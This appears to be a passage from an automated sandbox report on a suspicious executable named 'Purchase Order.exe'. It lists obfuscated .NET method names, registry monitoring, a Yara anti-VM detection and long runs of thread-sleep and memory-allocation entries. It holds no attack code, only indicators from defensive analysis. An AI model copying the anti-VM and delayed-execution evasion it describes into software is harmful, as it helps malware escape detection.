Source: 0.2.Purchase Order.exe.39e6b40.7.raw.unpack, vVw89GTEEGHZqfIDCx.cs	High entropy of concatenated method names: 'X3Yx295nxS', 'Y31xZsJag4', 'JOZcwj4OQg', 'lQZctJg0hx', 'a7Ux6N7GEG', 'bLSxOyK7jQ', 'r61xs3VDi1', 'OBpx3Y9Zja', 'CUrxARJwau', 'H34xie7QAl'
Source: 0.2.Purchase Order.exe.39e6b40.7.raw.unpack, XxsyFvU1CAusBHVG1V.cs	High entropy of concatenated method names: 'J0Pod33bwJ', 'khUomtQTW4', 'AxZoXw1qLa', 'dV5o5mPUlG', 'KTLoKEsHKY', 'NfpoMctu9w', 'zvmoklIB99', 'KeloWIIE5m', 'xN5o66GuNqds1ClZAQ5', 'D8AbbjGt7fxVYMqC8rL'
Source: 0.2.Purchase Order.exe.39e6b40.7.raw.unpack, kjRJGstEDDBD7iomiO.cs	High entropy of concatenated method names: 'bZQLTvo1E4', 'Hl7LltCtMG', 'Uh8Lv2umBl', 'aYALPm3lo3', 'r1tLy4Tf0H', 'G0ALo5Ofow', 'A5qLCkNuZW', 'oKbLNvLEef', 'n7eLGTUgx7', 'A2WL4oAXJ1'
Source: 0.2.Purchase Order.exe.39e6b40.7.raw.unpack, NFl9dTeWHfLYTLW3yh.cs	High entropy of concatenated method names: 'BOwcfTgKVm', 'rN2can3EPy', 'pDIcBpED2r', 'gjscbPBMJ9', 'Xlfc3MrNrL', 'W4wc9VxjtE', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Purchase Order.exe.39e6b40.7.raw.unpack, j0EE8QHk5lue28r8uB.cs	High entropy of concatenated method names: 'y8lFVoTBGV', 'M6iFk3yfQw', 'NjbFfEX5ph', 'aZXFaNxfLQ', 'zwRFbeddAK', 'RFyF9K89bD', 'jmtFeRO7tv', 'RjjFDO9HHC', 'QcWFJDbmLA', 'lc0F6IaUvi'
Source: 0.2.Purchase Order.exe.39e6b40.7.raw.unpack, NqErMOnywQIePHnE7F.cs	High entropy of concatenated method names: 'rILXRUNJW', 'uIO5rapyj', 'hVFKgVWnB', 'ugdMNT7OF', 'LApkb7ZdX', 'ugfWbVQMo', 'ElPbeGxQw5th3k45Tt', 'uRJtLA8y1a0gq4qu8O', 'm96clNdW1', 'L9o8QmBGB'
Source: 0.2.Purchase Order.exe.39e6b40.7.raw.unpack, pKSdd4qo7Rkj3dksBm.cs	High entropy of concatenated method names: 'F5WqtOB9mq', 'bdWqLaAYHI', 'BkqqQu8Pxv', 'HMAqlMeJHh', 'vVZqvFea7Z', 'xFuqyBEv51', 'aXxqoRwqxy', 'xrpcj3YbDb', 'cDhc2mRNl5', 'TgVcnUPxNl'
Source: 0.2.Purchase Order.exe.39e6b40.7.raw.unpack, YQF4gH9WZlmAWBbvtg.cs	High entropy of concatenated method names: 'lAoP5VQrLH', 'S4CPKCQEkc', 'sWSPVqhXVA', 'IpqPkOdfKp', 'hAiP0DHEva', 'TonP7yg5wc', 'oFaPxgCFBl', 'rEvPcikugr', 'kUvPqNMkp2', 'CIOP8uSvqS'
Source: 0.2.Purchase Order.exe.39e6b40.7.raw.unpack, upcImRcG3PisFQYZYA.cs	High entropy of concatenated method names: 'LhhTfCGWl7e0EoO8FL9', 'BQbIvkGETMccpAYFSHD', 'tZMocs5pF5', 'wDZoqJA0kZ', 'aWmo8uxyb6', 'oQ3Wx4GjxR7eTwbAG2C', 'PknOhJG2cVSMBekZp2H'
Source: 0.2.Purchase Order.exe.39e6b40.7.raw.unpack, V63kI3GXLZktwtCTbY.cs	High entropy of concatenated method names: 'saa0JW3rnx', 'NTr0OslvKM', 'd4W031LZGF', 'pu20ADFMvR', 'e9C0aEjl2X', 'vS20BGmeTV', 'A1y0b15m1p', 'vAx09XFnBO', 'W8f0RTeMvV', 'sL50eqCTor'
Source: 0.2.Purchase Order.exe.39e6b40.7.raw.unpack, RNRKGw6d6Amo4Pl09i.cs	High entropy of concatenated method names: 'Dispose', 'EpOtnBt4MW', 'rFpgala6pj', 'rhBEEc2hTd', 'zKxtZSP5hd', 'diftzx67AZ', 'ProcessDialogKey', 'rnlgwjEqBn', 'jTtgtD7Wmq', 'e3egg02fw4'
Source: 0.2.Purchase Order.exe.39e6b40.7.raw.unpack, sTTLqmdBg7QleA98M8.cs	High entropy of concatenated method names: 'B9Cv3PEAq0', 'foKvAKwSfD', 'RINviYhxm8', 'OEbvYuWYEt', 'STuvpVoEPP', 'maRvHrQ14C', 'KQ4vjA5YTj', 'g7yv2yhmS3', 'toevn9mJKh', 'RYcvZpIonu'
Source: 0.2.Purchase Order.exe.39e6b40.7.raw.unpack, AmI4iWbPi2Q5KPf6dLM.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mY183my4Xg', 'ILg8ATXMxg', 'pSE8in8O1N', 'OU88Y42Xr9', 'xAw8p1DNHF', 'FZy8H8lk7l', 'tP28jhoJVu'

Source: C:\Users\user\Desktop\Purchase Order.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: Purchase Order.exe PID: 1480, type: MEMORYSTR

Source: C:\Users\user\Desktop\Purchase Order.exe	Memory allocated: 920000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Memory allocated: 26D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Memory allocated: 2500000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Memory allocated: 7300000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Memory allocated: 6A80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Memory allocated: 8400000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Memory allocated: 9400000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Memory allocated: 2C90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Memory allocated: 2DF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Memory allocated: 4DF0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599282	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599157	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599047	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597750	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597641	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597516	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597391	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597281	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597170	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595986	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595425	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595182	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 594072	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 593905	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 593797	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 593688	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 593563	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 593438	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 593313	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 593203	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 593094	Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe	Window / User API: threadDelayed 7622			Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Window / User API: threadDelayed 2200			Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1288	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -28592453314249787s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 4724	Thread sleep count: 7622 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 4724	Thread sleep count: 2200 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -599657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -599532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -599407s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -599282s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -599157s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -599047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -598938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -598813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -598688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -598563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -598438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -598328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -598219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -598094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -597969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -597860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -597750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -597641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -597516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -597391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -597281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -597170s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -597063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -596938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -596813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -596594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -596469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -596360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -596235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -596110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -595986s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -595425s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -595297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -595182s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -595078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -594072s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -593905s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -593797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -593688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -593563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -593438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -593313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -593203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2892	Thread sleep time: -593094s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599282	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599157	Jump to behavior
